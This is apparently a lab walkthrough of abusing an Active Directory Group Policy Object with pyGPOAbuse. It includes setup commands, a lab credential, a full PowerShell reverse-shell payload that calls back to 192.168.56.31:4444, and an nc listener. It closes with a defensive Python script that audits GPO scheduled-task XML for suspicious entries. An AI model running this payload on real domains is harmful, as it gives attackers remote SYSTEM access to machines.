GPO abuse
The north domain has a GPO that can be abused.

To abuse the GPO we will use pyGPOAbuse, a project created by Hackndo.
The GitHub README says: “It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.”
git clone https://github.com/Hackndo/pyGPOAbuse.git
cd pyGPOAbuse
python3 -m pip install virtualenv
python3 -m virtualenv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
We get the ID from BloodHound and launch the exploit with:
Now let’s try to get a PowerShell reverse shell:
python3 pygpoabuse.py north.NewYork.local/miguel.cabrera:'ilovebaseball' -gpo-id "628D4237-8B4A-42C3-8599-66EB15352C43" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.56.31',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "You are done"

Catch the Shell - this needs to be done from the Lab Parrot OS VM.
nc -nlvp 4444
A few moments later we get the PowerShell reverse shell.
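
From the defender's side, the README sentence quoted above means the abuse leaves a scheduled-task definition inside the GPO itself. The following Python audit is an added example, not code from this page or from pyGPOAbuse; it assumes the Group Policy Preferences ScheduledTasks.xml layout, and the sample XML, the NORTH\svc_backup account and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed, simplified sample of a GPP ScheduledTasks.xml (not taken from the lab).
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="MyTask" changed="2024-01-01 10:00:00">
    <Properties action="C" name="MyTask" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions><Exec><Command>powershell.exe</Command>
          <Arguments>-NoProfile -Command "Write-Output test"</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Nightly backup" changed="2023-05-02 02:00:00">
    <Properties action="U" name="Nightly backup" runAs="NORTH\svc_backup">
      <Task version="1.2">
        <Actions><Exec><Command>C:\Tools\backup.exe</Command>
          <Arguments>/full</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# Hypothetical watch list of interpreters that rarely belong in a GPO task.
INTERPRETERS = ("powershell", "pwsh", "cmd", "wscript", "cscript", "mshta", "rundll32")

def local(tag):
    """Element name without any XML namespace prefix."""
    return tag.rsplit("}", 1)[-1]

def audit_scheduled_tasks(xml_text):
    """Return one finding per task, listing the reasons it deserves review."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = next((e for e in task if local(e.tag) == "Properties"), None)
        if props is None:
            continue
        run_as = props.get("runAs", "")
        cmds = [(e.text or "").strip() for e in props.iter() if local(e.tag) == "Command"]
        reasons = []
        if local(task.tag).startswith("ImmediateTask"):
            reasons.append("immediate task")
        if run_as.lower().endswith("\\system"):
            reasons.append("runs as SYSTEM")
        if any(c.lower().rsplit("\\", 1)[-1].startswith(INTERPRETERS) for c in cmds):
            reasons.append("script interpreter")
        findings.append({"name": task.get("name"), "run_as": run_as,
                         "commands": cmds, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_scheduled_tasks(SAMPLE_XML):
        print(f["name"], "->", ", ".join(f["reasons"]) or "no flags")
```

On a domain, the input would be each GPO's Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL; a task that collects all three reasons is worth comparing against the GPO's change history.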
